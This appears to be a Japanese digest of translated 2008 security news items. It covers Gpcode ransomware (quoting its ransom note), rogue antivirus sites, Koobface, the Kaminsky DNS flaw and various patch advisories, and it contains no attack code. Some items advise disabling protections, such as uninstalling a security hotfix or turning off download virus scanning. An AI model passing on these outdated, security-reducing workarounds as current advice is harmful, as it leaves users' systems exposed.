 あまり良くないニュースは、あなたのファイルの全てが最新のAES-256アルゴリズムを使用して暗号化されたことである。このプログラムは公開鍵と秘密鍵の方法を使用する。暗号化のために使用されるキーは99999存在する。そして、各感染マシン毎に一意のキーが使用される。二度使用されることはない。
 AES-256のキーをBrute-forcing(暗号解読手法の一つ。考えられる全ての鍵をリストアップし、片っ端から解読を試みる方式)は、この1000年以内では不可能である。アンチウィルス会社に頼ってもダメ。
 AES-256アルゴリズムは彼らのドキュメントを暗号化するためにAmerican special servicesによって使用された。

 一つ目の良いニュース: ファイルは復号化されることが出来る。
 二つ目の良いニュース: ファイルを復号化するためには、僅か10$支払えば良い。

 ファイルの暗号化と上述のメッセージを表示する以外に、Gpcodeはデスクトップも変更する。

 我々もまた、暗号化アルゴリズムに勘する上で示されたメッセージ中の情報(一意のキーの数とキーの長さ)は、これを書いている時点で確認されていないということを強調する。
 我々は暗号をクラックするためとファイルを修復する方法を探して暗号化アルゴリズムを解析中である。この最新のGpcodeの変種に攻撃されたなら、ここに記述されている方法を使用して、あなたのファイルを修復するように示唆する。我々は既にこの方法が全てではないが暗号化ファイルを修復したとするレポートを確認している。
 あなたが犠牲者になったら、kaspersky dot com の stopgocode 上の我々にコンタクトしなさい。もちろん、アップデートに関しこの場所を監視しなさい。

インチキソフト、Internet-antivirus
Sunbelt : blog (2008/08/11)

 このGUIはXPAntivirusに類似しているが、別のプログラムである。

 典型的なインチキのスキャンページ(そして、実際のブラウザ中の、インチキのシステムトレイメッセージに注意)
 このプログラムに実在するアンチウィルスエンジンによる殆ど実在しない検出。
 サポートしているサイト

    ia-scanner com
    ia-license com
    ia-payment com
    ia-support com

Windows Vistaのセキュリティは壊れているか?
The PC Informant : blog (2008/08/09)

 Vistaセキュリティに関する新たなレポートが真実ならば、Microsoftはもの凄い頭痛の種を持ったことになる。Neowinの報告:
 Black Hatセキュリティ カンファレンスで今週、二人のセキュリティ研究者は、Windows Vistaを完全に崩壊させるかもしれない彼らの発見について議論するだろう。

     Mark Dowd(IBMインターネットセキュリティシステム)とAlexander Sotirov(VMware Inc.)は、MicrosoftがWindows Vistaに備え付けている全てのメモリ プロテクト セーフガードをバイパスするために使用できる技術を発見した。この新しい方法はアクティブなWebサーバを通して悪意あるコンテンツをロードすることにより、VistaのAddress Space Layout Randomization (ASLR), Data Execution Prevention (データ実効防止)と他のプロテクションを上手く逃れるために使用された。この研究者は様々なオブジェクト(Java、ActiveX、.NETオブジェクトのような)を使用して、ユーザのマシンの望む場所に望むコンテンツをロードすることが可能だった。この妙技はInternet Explorerや他のブラウザが オペレーティングシステム中のアクティブスクリプトを操作する方法を利用して完成させられていた。
     これはスタンダードセキュリティホールなのかもしれないので、他の研究者はこの業績は大変な大発見であり、Microsoftがこの問題を修正できる可能性は殆どないと発言している。新たなWindowsの脆弱性に基づいておらず、代わりに、MicrosoftがVistaの基本的アーキテクチャをガードするために選択した方法を利用しているので、この様な攻撃は他のセキュリティの脆弱性を攻撃するのとは大きく異なった方法で動作する。著名なセキュリティ研究者Dino Dai Zoviによれば、「この特質は完全に再利用できることである。それらは選択されたパーミッションで、選択された場所に、選択されたコンテンツのロードさせる攻撃を行う。完全に終わりである。」

 Microsoftは最大のセールスポイントの一つとしてVistaの想定したセキュリティを大変強調していた。Microsoftがこの開発をどのように取り扱うかを確認することは大変重要である。読んだ幾つかのコメントから、気に入らないが、私は上の引用が示唆しているのと同じように、物事が終末的でないかのような印象を得た。あるコメントは次の様に言っている。

     もし、あなたがUACを無効化した(IEでプロテクトモードなし)アドミニストレータとしてVistaを使用したなら、IEやFirefox中にフローがあったなら、このフローはWindows XP下と同様に脆弱性をつく攻撃を成功させることになるだろう。
     そこで、UAC有効とIEプロテクトモードを有効にしたWindows Vistaは未だWindows XPより安全であるし、ユーザは以前よりリスクはずっと少ない。
     UACとプロテクトモードは未だ効果があるので、この様なハッカーはVistaセキュリティシステムが、Vistaにおける二つの最高のプロテクション機能であるにもかかわらず、現在完全に役に立たなくなっているとする発言は明らかな嘘である。

 そこで、この問題はどのくらい深刻なのか明らかにされないまま残っている。

Thawte認証付きの新しいインチキソフト、Power Antivirus 2009
Sunbelt : blog (2008/08/02)

 Power Antivirus 2009(最近、たちの悪いインチキなアンチスパイウェアの世界にpower-antivirus-2009 comとして参加した)は先週末に一斉射撃することを開始した。
 因みに、このインストーラは、VerisignのThawte部門によって署名されている。

Double blow against 2.0
Kaspersky : Lab Weblog (2008/08/01)

 IT mediaを読んでいる方なら、昨日我々が発見した新たなワーム(Net-Worm.Win32.Koobface : FacebookとMySpaceアカウントを攻撃する)につ関するレポートを見たかもしれない。我々は今までに四つの変種を入手した。そして、もっと出現するかもしれない。
 このワームはとっても簡単なアプローチ(ビデオへのリンク)を使用している。そこで、ユーザがこのビデオを見ようとした時、ユーザはFlash Playerのアップデートを必要とするというメッセージを得ることになる。これは我々がしょっちゅう見てきたアプローチ(”Flash Player”をダウンロードさせるが、そこにはユーザのマシンに新たなマルウェアを置く)である。

もちろん、FacebookやMySpaceに対する最初のマルウェアではない。我々は我々のコレクションをずっとチェックし続けている。そして、我々はMySpaceを攻撃する(Facebookは攻撃しない)このワームの変種を早期に発見した。Koobfaceの背後にいるこのウィルス製作者は、明らかに犠牲者の数を極限まで増やそうと試みている。botnet(ボットネット)は更に大きくなるだろう。
 Koobfaceの背後にいる奴は、実際にはスパイウェアであるXP AntivirusとAntivirus2009というインチキなアンチウィルスプログラムにも関連している。我々は、ワームコードをも含んでいるこのようなスパイウェアプログラムのインストーラを検出した。Trojan-Downloader.Win32.Fraudload(XP Antivirus等をダウンロードするためにしようされる)は、今ワームファイルをダウンロードするために使用されている。
 この結果は二重の苦しみである(ワームによって感染させられた上、botnetに組み込まれる)。犠牲者のマシンはスパイウェアのこの様な汚らしい部分の一つによって攻撃されるだろう。

メディア マルウェア ー 覗いてみる
WEBSENCE Security Labs : Threat Blog (2008/07/30)

 一部のマルウェアは、ユーザのミュージックファイルを改竄することが発見されている。そのため、ミュージックファイルは更なる感染への脆弱性がある。この感染は、その手のファイルが他の人と共有されているのであれば拡散することもまたが出来る。このマルウェアはユーザのドライブのミュージックファイルを検索し、悪意あるURL(音楽再生データ置き場)を注入(必要な変換を行ったのち)する。これは、ユーザ定義コマンド(この場合は、URLANDEXIT)で音楽ファイル中にスクリプトを挿入するWindows Media Format SDKによって提供されるAddScriptメソッド経由で完成される。これが仕事している方法の簡単な解析と、悪意あるファイルに焦点をあてるには、以下を参照。

高解像度ビデオ(.mov)をダウンロードするにはここをクリック

 我々はこの感染が動作する方法を知り、幾つかのファイルが感染させられることを確認した今、我々が実行すべきことは、動作中にこの攻撃を確認するためファイルの一つを再生することである。以下に見られるように、再作成された画像において、ユーザは悪意あるファイルを(コーデックとして通知されている)ダウンロードし稼働することをプロンプトされる:

 実際にあるビデオコーデックが存在しないとき、ユーザはそのようなメッセージを好意的に受け取る。そこで、それを好意と考えRunをクリックする。そこでマルウェアを追加し自分自身を感染させることになる。

RealPlayer、深刻なセキュリティホールを修正アップデート
heiseSecurity : Security (2008/07/28)

 RealNetworksは深刻なセキュリティホールを修正したRealPlayerの様々なバージョンのアップデートを提供した。このアップデートはWindows版のバージョン 10, 10.5, 11 マッキントッシュ版とLinux版に影響を与える。ユーザは、このアップデートをインストールすることは不可欠であるとアドバイスされている。解決した問題の中に、4ヶ月前発見されたActiveXモジュール中に脆弱性と、深刻度「高」に評価されるバッファオーバーフローと、そしてセキュリティ情報サイトSecuniaによってアドバイスされた、悪意あるソフトウェアの挿入とインストールさせることのできる脆弱性が存在する。

以下もまた参照。
RealNetworks, Inc.、セキュリティ脆弱性に対応するアップデートをリリース(RealNetworkのカスターマーサポートのサイトです)

インターネットセキュリティ設定を強化せよ
WashingtonPost : Security Fix (2008/07/25)

 インターネット基盤中の深刻なフローに対し、それを全面的に攻撃し成果を上げる方法をサイバー犯罪者に示す示唆の公開により、Webは今週今まで以上に危険な場所となった。
 インターネットサービスプロバイダや会社が彼らのネットワークの脆弱性あるコンポーネントを供給しているソフトウェアをアップデートすることによって危険を軽減するまで、昨日リリースされたデータは世界のオンライン人口のおよそ半分がこの様なアップデートによって現在保護されているにすぎないことを示唆している。
 この問題はドメイン ネーム システムの基本的設計フローである。DNSはインターネット用のある種の電話帳のように行動する(ネットワーク装置が操作し道順を決めることを容易にする数値アドレスをexample.comのような可読出来るWebサイト名に翻訳すること)コミュニケーション標準である。
 人々が彼らのインターネットブラウザにWebサイト名をタイプしたとき、インターネットアドレスへのその名前のルーチンプロセスは一般的に、インターネットサービスプロバイダと会社によって管理されるDNSサーバを通して取り扱われる。
 しかし、今月リリースされた研究によれば、これらDNSサーバの大部分は、この様なシステムがトラフィックの道順を決めるために信頼している仮想ロードマップの暗黙の改竄を悪人に許可するセキュリティフローに対する脆弱性がある。結果として、サイバー犯罪者が明らかにこの様なレコードを書き直すと、脆弱性あるISPやネットワークプロバイダの顧客は特定のWebサイトを訪問することを試みたとき、代わりに悪い奴等によって作成された偽造サイトに連れ込まれる。
 例えば、脆弱性があれば、この脆弱性はスカマーに個人情報(インチキの銀行や電子商取引サイトで重要なデータを入力させ、人々を欺くことで社会保障番号や銀行のアカウント)を容易に盗むことを支援する。  Dan Kaminksy(この脆弱性を発見したセキュリティ研究者)は、このフローに関する修正を考案するために他の研究者の支援を得て約6ヶ月間秘密裏に仕事した。7月8日、珍しい調整努力で、多数のソフトウェアベンダ(Microsoftを含む)は顧客を助けるためにセキュリティパッチを出荷した。そして、ネットワークプロバイダは彼ら自身を保護した。
 水曜日、明らかにこのフローを攻撃し成果を上げるための方法のコンピュータコードのデモがオンラインにポストされた。このコードははまた、即座にMetasploit(セキュリティ研究者向けの攻撃コード開発および検証ツール)に取り込まれた。
木曜日の電話会議において、Kaminskyは彼のWebサイトに置いた診断ツール(訪問者のISPがパッチを当てているかを確認するためのツール)のデータは、多くのプロバイダが実際にその脆弱性の修正を終わっているが、多くのプロバイダが未だこの問題に立ち向かっていないことを示した。Kaminskyは、このパッチが最初にリリースされた7月8日の時点で、このテストツールを使用した凡そ86%の人々が脆弱性が修正されていないネットワークから来ていた。木曜日、訪問者の52%が脆弱性の修正されていないネットワークから来ていた。
 この脆弱性を誇大と考えてはならない。この脆弱性はサイバー犯罪者にとって多くの注意を引く魅力的なものであると発言するKaminskyや他の人の警告を考慮しなさい。
 「この攻撃はインターネット上の兵器に加工されている」とKaminskyは発言している。
 Joao Damas(インターネットでもっとも利用されているDNSサーバを提供するオープンソースソフトウェア”BIND”を維持するInternet Systems Consortiumの上級プログラミングマネージャ)は、このフローを攻撃し成果を上げようとする攻撃の証拠を確認したと発言した。
 「私はインターネット上でこの脆弱性を突き成果を上げるために連動させられているコードを既に確認している。探すまでもなかった」とDamasは発言している。
 私の読者へのアドバイスはKaminskyのサイトのテストツールを訪問することである。その答えが、あなたのISPには脆弱性があるなら、この記事のコメントセクションに、それをポストしてほしい。

    【訳注】
     テスト結果を表示しておきます。
     以下のメッセージが出れば、脆弱性はありません。

    Your name server, at ***.***.***.***,(あなたのプロバイダのDNS) appears to be safe,
    この後、but make sure ************** と文章が続く場合があります

あなたのISPが未だこの重要なフローを解決していないのであれば、以下の方法の一つを使用してあなた自身を守ることを考慮しなさい。

    1。OpenDNS(このフローへのパッチだけでなく、フィッシングサイトへ焦点をあてることを助け、そしてあなたのネットワーク上の人々を他の好ましくないWebサイトへの訪問を妨げるDNSサーバを通してあなた方全てにWebサイト検索の道順を示すフリーサービスの実体)によって提供されるDNSリゾルバを使用するようにシステムをセットアップしなさい。

    2。このフローに対してパッチをあてていることが知られているサーバを使用するためにDNS設定を再構成する。この様なサーバの幾つかは、4.2.2.1 と 4.2.2.2 を含んでいる。Windowsでこれを行うには、スタート>コントロールパネル>ネットワーク接続 に進み、既に接続している接続名上をダブルクリック。そこから、インターネットプロトコル設定までスクロールダウンしプロパティをクリック。「手動で設定するUse the following DNS server addresses,"」がチェックされていなければ、このラジオボタンのチェックをいれる。以下の設定で 4.2.2.1 と 4.2.2.2 と入力。設定を終了するために「OK」をクリック。この設定変更はあなたがアドミニストレータ(管理者)アカウントでWindowsにログインした場合のみ許可される。

 Windowsマシンに関し今月早くにMicrosoftが出荷したパッチはこの問題の一側面を解決したので、悪い奴等がこの脆弱性を突き功績を上げることをより困難にしているが、Windowsユーザは未だこの様なステップに従うべきである。多くのWindowsユーザは疑いなくこのアップデートを遅らせるか、オンライン接続からZoneAlarmファイアーウォールのユーザを妨げるとするニュースに従ってアンインストールしている。ZoneAlarmはこの互換の問題を修正するアップデートを既に出荷している。
 最終通告: 一部の人々はこのフローを解決するため長い時間を掛けてISPに流動性を与えるこのような変更の健全さに疑問をはさむかもしれないが、私は必要以上に注意深くなるよう読者に強く促す。一つには、オンライン詐欺師はオンライン上の人々の個人データ等を盗む最新の方法を採用したがっている。二つ目に、ここで示している間に合わせの解決方法は恐ろしく単純な修正である。たとえ無期限にそのまま放置しても、大多数のインターネットユーザのオンラインの利用に悪影響を与えない治療方法である。

Thunderbird(E-Mailクライアント)セキュリティアップデート
heiseSecurity : Security (2008/07/24)

Mozillaは彼らのオープンソースのメールクライアントの六つの深刻度「中」と二つの深刻度「小」のセキュリティホールを修正したThunderbird 2.0.0.16をリリースした。深刻度「中」のセキュリティホールはFirefox(深刻度「大」の評価)で以前塞がれた幾つかの脆弱性を含んでいる。このセキュリティホールの脆弱性を攻撃し成果を上げるためにはJavaScriptが要求される。しかし、ThunderbirdではJavaScriptはデフォルトで無効化されている。それが「中」と評価される理由である。
 開発者は早急にバージョン2.0.0.16にアップデートするよう推薦している。ユーザは自動アップデートオプション経由、もしくはこのプログラムを手動ダウンロードすることでアップデートすることが出来る。

Firefox3はIE7のセキュリティ設定に従う
Washingtonpost : Security Fix (2008/07/21)

 MicrosoftのIE7のセキュリティ設定を偏執的レベルにまで上げている(【訳注】レベル:高)Firefox3のユーザは、最近Mozillaが行った主たる変更によってFirefoxでファイルをダウンロードすることが通常通りでないことを発見するかもしれない。
 この前の金曜日のSecurity Fixのライブチャットで、ある読者は彼女がIE7のセキュリティを下げるまでFirefoxで如何なるファイルもダウンロードできなかったと不平を言った。「私はIEを通常使用しないので、IEのセキュリティ設定をいつも『高』のままにしておく。・・・私は発生しないことを確かめるためFirefoxの全てのセキュリティ設定を低くした。この問題はnoscriptを使用しなくても存在した。IEの設定を低くした場合だけ、ダウンロードできた。」
 この油断の無い読者は、私の質問者に対するアドバイスに関し電話し、私が数週間前実際に読んだDSL Reportで、この主題に関する沸騰した議論のスレッドに私の注意を向けさせた。
 ここで何が起きているのか? Mozillaによれば、「Firefox3を起動し、実行ファイル(例えば、exeやmsi)のダウンロードは失敗するかもしれない。そして、Firefoxダウンロードウィンドウはダウンロードしようとしたファイル名の下に、以下のメッセージを含むだろう:

    - This download has been blocked by your Security Zone Policy
    - このダウンロードはあなたのセキュリティゾーン ポリシーによってブロックされた。」

 Mozillaはこの問題の発生理由を次のように述べている。Firefoxの今までのバージョンと異なり、最新バージョンは現在ダウンロードアプリケーションに関してWindowsセキュリティ設定(IEを通して形成される設定)を支持している。
 これは、Mozillaによる(そして、おそらく一部の忠実なFirefoxユーザーにとって)突然の方向転換のようであるかもしれない。しかし、この会社はビジネスで最も汎用的に使用されているブラウザ上で既にセキュリティ設定されていることを尊重することでより大きな会社環境をここで獲得しようとしていることは明らかである。
 Firefoxのこの挙動を変更するための唯一の方法は、IEのセキュリティ設定を低くすることである。この設定を変更するためには、インターネットオプション(コントロールパネル経由、もしくはIEのメニューからツールから)を開き、セキュリティ タブをクリックする。インターネットゾーン アイコンを強調表示させ、レベルのカスタマイズ ボタンをクリックする。インターネットゾーンのためのセキュリティ設定のリストが表示される。「アプリケーションの起動と危険なファイル」設定(Miscellaneousの下)を見つけ、「プロンプト(推薦)」を選択する。この変更がこのトリックを解決しないなら、Mozillaはもう少し他の示唆を提供している。このリンクはこちら(英文です)。
 Firefox3はまた、ホストマシンにインストールされているあらゆるアンチウィルスソフトウェアとともにダウンロードされたファイル全てをデフォルトでスキャンする。Mozillaは「若干の場合において、これはダウンロードされたファイルの保存にかなりの遅延を発生させるかもしれない。」と指摘している。ちなみに、この機能は私のPCにインストールされているアンチウィルススキャナ(NOD32)を操作するようには見えなかったが、あなたのアンチウィルスソフトウェアでは違うかもしれない。
 Firefox3ユーザはアドレスバーに"about:config"(【訳注】引用符不要)と入力し、"browser.download.manager.scanWhenDone"までスクロールダウンし、この設定を"false"に設定することによってFirefox3でのダウンロード自動ウィルススキャンを無効化できる。
 あなた(Security Fixの読者)はどうですか? この変更についてどのように感じますか? あなたは家や仕事場でこのようなことに遭遇したことがありますか?

oSpyでマルウェアを挫折させる
WEBSENCE Security Labs : Threat Blog (2008/07/18)

 今日のブログは、Andre Vadla Ravnasの作成したoSpyと言うツールについてである。oSpyはリバースエンジニアリングを支援するWindows用のツールである。このツールの使用と、ネットワークトラフィックを監視する方法をデモするために、我々のアーカイブから任意のマルウェアのサンプルを使用した。

    【訳注】
     リバースエンジニアリング(Reverse engineering)とは、プログラムの動作の解析等を行い、構造の分析やソースコードなどを調査し利用すること。

 VMWare(【訳注】仮想化ソフト)の実行環境で、oSpyと共にマルウェアのサンプルを実行し、そのトラフィックをモニタした。
 ProcessExplorer(プロセスエクスプローラ)は、このマルウェアが x.exe という名前で実行されていることを示した。

 以下で、oSpyがこのネットワークトラフィックを阻止していることを見ることができる。

 このデータをより詳しく見てみる。
 ここに、ネットワークAPI関数がネットワーク接続に関連させられていることを、oSpyは我々に認識させていることを確認できる。

 oSpyはネットワーク上で送受信されるそれぞれのデータを、我々が注目することを可能にする。

 ネットワークの解析から、このサンプルのマルウェアが .CNウェブサイトから 2.exe と 3.exe と呼ばれるバイナリをダウンロードすることを試みていることを確認できる。
 WiresharkではなくoSpyを稼働する主たる理由の一つは、oSpyがユーザに属し、その環境下にある者によって使用される監視プログラムであり、全てのネットワークトラフィックではなく、ある特定のアプリケーションだけを監視することが可能なことである。この方法で、どのトラフィックが、どのプロセスから構成されたのかを確認できる。oSpyはユーザAPIコールをフックするので、我々がIDA Pro Disassemblerで呼び出すAPIを同期することを可能にする素晴らしい機能もまた持っている。

 oSpyはあなたのアンチマルウェアツールキット中に所有すべき素敵で簡単なツールである。

Microsoft Accessのスナップショットビューワー
F-Secure Weblog : News from the Lab (2008/07/18)

 Microsofst Office関連のセキュリティアドバイザリが先週リリースされた。このWebログの常連は他の技術ニュースソース経由で既に呼んでいるかもしれない。
 まず、Microsoft Office Word 2002 Service Pack 3にのみ影響のあるMicrosoftセキュリティアドバイザリ 953635である。あなたがワードの該当バージョンをインストールしているのであれば、解決したり、アップグレードしたり、さもなければ全ての外部ドキュメントファイルを回避するために、Word Viewer 2003をダウンロードすることを望むかもしれない。
 次に、Microsoftセキュリティアドバイザリ 955179である。Microsoft Accessスナップショットビューワー用ActiveXコントロール中の脆弱性は、リモートコード実行を許可する。この特定の脆弱性は先週インターネットエクスプローラーに関連するため幾つかのニュースとなった。この脆弱性は現在パッチが充てられていない。そして、フィールド上で脆弱性を攻撃し成果を挙げようとする幾つかの限定的ケースが発生している。
 この様なケースの一つに、JavaScriptを挿入された数千のサイトと共に特許を話題にしたサイトを含んでいる。それはNeosploitと呼ばれる人気あるキットでハックされ、ActiveX脆弱性を混合されたサイトであるかのように見える。これは一つのサイトだけでなく多くのページもそうである。
 我々はスナップショットツールを殆ど使わない。そこで、今週早期に試してみた。
 Office 2007以前のMicrosoft Accessの多くのバージョンはこれを同梱している。しかしながらOffice 2003のAccessを持っていても、インストールしなければならないものではない。デフォルトのオプションは初回使用時にスナップショットビューアをインストールするようになっている。
 インターネットエクスプローラがSNPファイルに遭遇し、あなたがOfficeの「フル」インストールでなく「デフォルト」であったなら、そこで起こることは何か?
 正当なファイルは以下のブロンプトを表示する。

 次に継続することを決定し、幾つかのプロンプトを処理したなら、IEはOfficeインストーラを呼び出すだろう。
 我々の経験上では、多くの人々は以下のプロンプトを表示されるだろう。

 次に、インストレーションCDを挿入しなければならない。もしくは、ネットワークフォルダをインストレーションファイルに関連付ける為にIT出身の友人に電話をしなければならない。
 これはスナップショットビューアOCXのインストールに多くの問題を抱えているかのようである。これは完全な功績からは程遠い。
 しかし、そこにはAccess 2003のフルインストール等がある。
 あなたはこの脆弱性を持っていると考えているか? ここにテストがある。このリンク(SNP.HTML)をインターネットエクスプローラで開きなさい。
 この「秘密のメッセージ」を容易に読むことができたのなら、MSA 955179で推薦されているkillbit(キルビット)を設定することを望むかもしれない。

アンチウィルスソフトウェア中の脆弱性
McAfee Avert Labs : Blog (2008/07/10)

 最近のZDNetブログは、N.Runsが殆ど全てのベンダのアンチマルウェア製品から脆弱性が発見されたと発言したドイツの研究チームの巨大な数の脆弱性を論議している。ZDNetのポストはセキュリティ製品のユーザに恐怖を与えるゾッとするグラフ(【訳注】この記事の末尾に添付しておきます)が含まれている。我々は、生データを解析することによってN.Runsが主張することを研究した。そして、彼らの主張に誇張された何らかの物があることを発見した。我々は添付されたドキュメント中に発見したこと(そして、我々のソースデータを利用可能にする)を議論するだろう。我々は我々のソースデータを検証することを望む者の為にそれの提供をする。
 まず、N.Runsは実際に多くの脆弱性を発見している。そして、彼らはこの件に関し賞賛に値する。我々は過去にN.Runsのチームと仕事してきた。そして、彼らが大変信頼でき、理に叶った研究者であることを理解した。我々は彼らが発見した脆弱性の正当性を攻撃しようとは思はないが、これがセキュリティの状態を意味することに関して導かれた結論については異議を唱える。
 ZDNetとN.Runsの主張を深く検証するために要求される多大な情報のため、我々は全てのブログエントリをPDFフォーマットで提供することが良いと感じた。本件に関する詳細は添付ドキュメントを参照されたい。

Full Article (in PDF Format)

【訳注】

アンチウィルスソフトが有する全脆弱性の分類


アンチウィルスソフト別の脆弱性

ZoneAlarm、インターネット アクセス トラブル解決法を公開
ZONEALARM SECURITY ADVISORY (2008/07/09)

 重大性 : 高

 概要 : Microsoft Update KB951748が、Windows XP/2000のZoneAlarmユーザのインターネットアクセスの失敗を引き起こすことは既知である。Windows Vistaユーザは影響を受けない。

 インパクト : 突然インターネットアクセスが失敗する。

 影響されるプラットフォーム : ZoneAlarm Free, ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Anti-Spyware, ZoneAlarm Security Suite

 推奨されるアクション : インターネットアクセスを失敗する問題を解決する最新バージョンを以下からダウンロードしインストールする(英語版のみ)。

 あるいは、以下の指示に従う。

 オプション1 : インターネット ゾーン スライダを「中(Medium)」に設定する。

     "ZoneAlarm Firewall"パネルに進む。
     Firewallタブをクリックする。
     インターネット ゾーン スライダを「中(Medium)」に移動する。

 オプション2 : Microsoftのホットフィックスをアンインストールする。

     「スタート」クリック。
     「コントロールパネル」をクリック。
     「プログラムの追加と削除」をクリック。
     「プログラムの追加と削除」ダイアログの上端の、「アップデートを表示」チェックボックスにチェックが入っていることを確認。これにチェックが入っていなければチェックを入れる。
     スクロールダウンし、"Security update for Windows (KB951748)"を見つける
     このホットフィックスをアンインストールするために削除ボタンをクリックする。

 このアドバイザリに関する疑義や技術上の疑問はこちらにアクセス

40%のWebユーザが安全でないブラウザでWebサーフィンしている
WashingtonPost : Security Fix (2008/07/01)

 本日リリースされたオンラインサーフィンの習慣に関する包括的最新の研究は、この惑星のインターネットユーザの60%が最新のWebブラウザ(彼らが優先的に使用しているWebブラウザの最も安全なバージョン)でサーフしていることを発見した。
 Google, IBM, スイスのCommunication Systems Groupによって実施されたこの研究は2007年1月から2008年6月の間に要求されたGoogle検索によって提供されたサーバーログからのデータを信頼している。この研究者達は、2008年3月の末で14億の世界中のインターネットユーザのうち、5億7600万が最新版でないウェブブラウザのバージョンでサーフィンをしていたことを発見した。
 研究者達は、これをグループ化して結論してもいる。Mozilla Firefoxユーザは最新バージョン(ブラウザの最も安全で安定しているバージョン)を使用する傾向にあり、Firefoxユーザの83.3%が、その時々で最新バージョンをインストールしていることが発見された。これは、Safariの最新バージョン65.3%、Operaの最新バージョン56.1%の使用に比べ顕著である。

 Microsoft Internet Explorerユーザの47.6%だけが最新のバージョン(最も安全なバージョン、IE7)でブラウズしていた。この研究の目的のため、研究者達はIE6ユーザを「安全でないバージョンのユーザ」中に一括りにしている。追記として、私はこの分類に同意しなければならない。幾許かの他の緩和するステップを採用することなしに(制限付きユーザアカウントの下でWindowsを稼働するような)、彼らのメインブラウザとして未だIE6を使用している者は、彼らのシステムとデータのセキュリティでロシアンルーレットしているようなものである。
 このレポートはFirefoxユーザが最新版の使用する傾向にあり、その理由はMozillaのパッチプロセスが最も高速で最も苦痛が少ない(論議の余地は無い)為であるとしている。Firefoxは自動的にアップデートをダウンロードする。そしてユーザに即座にインストールするか尋ねる。ユーザがこのアップデートを拒否したら、このパッチはこのブラウザが次回起動された時にインストールされる。Operaは新しいバージョンを起動時にチェックするが、ユーザに手動ダウンロードと、このブラウザの再インストールを要求する。Safariは一定の間隔で新しいアップデートをチェックするSafariに含まれていないApple-updaterを使用する。IEは、Microsoftが毎月第二火曜日にパッチをリリースするので、大まかに30日毎にアップデートされる。
 「我々は、Firefox中に実装されている自動アップデートメカニズムは、このWebブラウザの良く考えられた最も効果的なパッチメカニズムであると信じている」とこの研究者達は記している。
 この研究者達はブラウザユーザの何パーセントが安全でないプラグインをインストールしていたかということを研究する気は無いようである。それは、この研究がGoogle Webサーバによってログされたデータと各ブラウザによって渡される「ユーザエージェント」(そのアプリケーションのバージョンに含まれるデータ(オペレーティングシステム、defaultの言語、その他の情報)に限定されている為である。プラグインのデータは、一般的にこの様なフィールドに記憶されない。
 彼らは最新版でないプラグイン(Flash Player, Java, QuickTime, Adobe Reader)を稼働している幾つかのブラウザを計測する方法を発見したのなら、それは完全にパッチを充てたブラウザでWebをサーフィンしているユーザの割合は60%を大きく下回るだろうことへの安全策である(多分、15〜20%程度)。
 この研究者達は現在までにブラウザマーケットシェアの最も広範な調査を実施したかもしれない。彼らは6月中旬に、Firefoxはマーケットシェア16%であるが、IE(IE6とIE7を加えたもの)はインターネットサーファーの78%によって使用され、SafariでサーフしているWebユーザは3%、Operaユーザは凡そ1%であることを発見している。

従順なInternet Explorerプラグイン
WashingtonPost : Security Fix (2008/06/27)

 Security Fixはしばしば、MicrosoftのInternet Explorer Webブラウザユーザは安全でない”ActiveXコントロール”(伝統的にスパイウェアやアドウェアの攻撃の最大の方法の一つであるIEのプラグイン)を殺すことに役立つポイント・アンド・クリック ソフトウェアが殆ど無いことを嘆いてきた。それが、私が幅広く使用されているサードパーティー製ソフトウェアアプリケーションの幾つかによってインストールされる、安全でないActiveXプラグインを無力化する”AxBan”と呼ばれるフリーの新しいツールを、注目するよう呼びかけることを嬉しく思う理由である。
 ActiveXはIEとWindowsオペレーティングシステムの両方に織り込まれているMicrosoftの創造物である。これはWebサイト(マルチメディアが豊富にあるページ)が双方向の開発が可能なようにデザインされていた。しかしながら、この様なパワフルな昨日は稀にセキュリティの犠牲の上に出現していた。
 サードパーティーのソフトウェアと共に配布される多くのActiveXコントロールは"safe for scripting"(【訳注】スクリプトを実行しても安全だとマークされているActiveXコントロール)であるが、下手糞に設計されたActiveXコントロールは、サイバー犯罪者にとって大変強力な武器である。これは、そのようなActiveXが呼び出された時、ユーザの許可を要求することなしに起動することを意味している。結果として、あらゆるWebページは、このコントロールと、そのメソッドを使用できる。それは多くの場合、有害な可能性のあるコードをダウンロードし実行するための能力を含んでいる。

    【訳注】
     Safe for scriptingマークが付いているActiveXコントロールは、IEのセキュリティ設定が高められていなければ、Webページ上のスクリプトから呼び出すことができる。即ち、インターネット上のWebページにアクセスしただけで,そのActiveXコントロールを実行させられる。このため,システムに影響を与えるようなメソッドを持つActiveXコントロールには,Safe for scriptingマークを付けないことになっている。
     Safe for scriptingマークが付いていなければ,Webページ中のスクリプトから、ActiveXコントロールを呼び出すことはできない。

 ActiveX脆弱性はしばしばハッカーによってターゲットにされるだけでなく、大多数の汎用されているブラウザに関連した脆弱性でもある。最新のインターネットの脅威に関するレポートで、SymantecはWebブラウザプラグイン中に239の新たな脆弱性を実証している。Adobe Acrobat, Flash, Java, Mozilla Firefox, QuickTime, Windows media player用プラグインは、このような脅威の21%を占めた。残り(79%)が、ActiveX関連の脆弱性である。

 IE7がActiveXコントロールの自動ダウンロードを防止する特別なセキュリティ防御を含んでいることは真実であるが、IE7は、まさに一部であるが、Adobe Reader, QuickTime, iTunes, Java, Flashのようなサードパーティー製ソフトウェアプログラムによって既にインストールされているActiveXコントロールの実行と巧妙な操作を妨げることは行わない。経験上、プリントソフトからメディアプレイヤーやソシャルネットワークサイトのプラグインに至る山の如きプログラムはそれら自身のActiveXコントロールをインストールするが、これらのコントロールをインストールさせられた大多数の人々は、それらが削除されたり無力化されても、どうということは無いだろう。
 Errata Securityによって開発された AxBan 1.5 Betaは、このリンクから利用可能である。このプログラムを開始すると、AxBanを使用することはシステムレジストリの変更と、ユーザ自身のリスクで開始するよう警告する。私はこのプログラムを少なくとも四つのシステムで使用したが、悪い効果は見られていない。変更は僅かなので、この変更がユーザのシステムを台無しにする可能性は無いに等しい。

 このプラグラムのメインウィンドウが開いた時、あなたがどのようなActiveXプラグインをインストールしているか確認するには、”ActiveX”タブをクリックしなさい。インストールされているもののうち、有効化されている物は赤でリストされる。有効化されているActiveXコントロールを無効化する為には”Killbit”ボタンをクリックする。一旦無効化したActiveXコントロールを、将来何らかの理由で再び有効にする必要がある場合は、必ずAxBanを起動し、再有効化したいActiveXコントロールを強調表示し、"Unkillbit Selected"ボタンを選択する。
